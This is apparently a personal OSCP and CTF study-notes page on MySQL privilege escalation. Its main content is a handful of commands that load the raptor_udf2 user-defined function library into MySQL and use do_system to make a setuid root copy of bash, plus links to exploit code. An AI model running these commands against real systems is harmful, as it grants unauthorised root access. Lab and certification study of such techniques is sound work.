OSCP + CTF
  • Windows Privilege Escalation
  • Most Important Links
  • Tooling
    • Apache
    • Windows Basic Recon
    • Find
    • Recon
    • DNS
    • Socat
    • Fave sql Injection
    • Xterm setup
    • Powershell Shells
    • Powershell General Info
    • Powercat
    • Fucking SMB
    • Fucking LDAP
    • Tunneling + Pivoting
      • Chisel
    • Powershell
  • Web CTF
  • General Helpful Links
  • Music OBVI
  • MySQL Privilege Escalation
  • sudo -l
  • phpMyAdmin
  • Squid 🦑
  • OSCP Labs
    • Assembling The Pieces
    • 10.11.1.101
    • 10.11.1.14
    • 10.11.1.141
    • 10.11.1.252
    • 1011.1.35
    • 10.11.1.237
    • 10.11.1.71
    • 10.11.1.50
  • HTB
    • Agile
  • OSCP Proving Grounds
    • Template
    • Authby
    • Nibbles
    • Fail
    • CTF1
Powered by GitBook
On this page

Was this helpful?

MySQL Privilege Escalation

MySQL Server version: 5.0.77 Source distribution

Last updated 2 years ago

Was this helpful?

select * from foo into dumpfile '/usr/lib/raptor_udf2.so';

select * from mysql.func;

mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Spawn Shell from MYSQL

Exploit Code

Exploit Code

Mysql general info for priv esc

https://it-tfuerst.de/2021/02/08/linux-privilege-escalation/
https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
https://www.exploit-db.com/exploits/1518
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/payloads-to-execute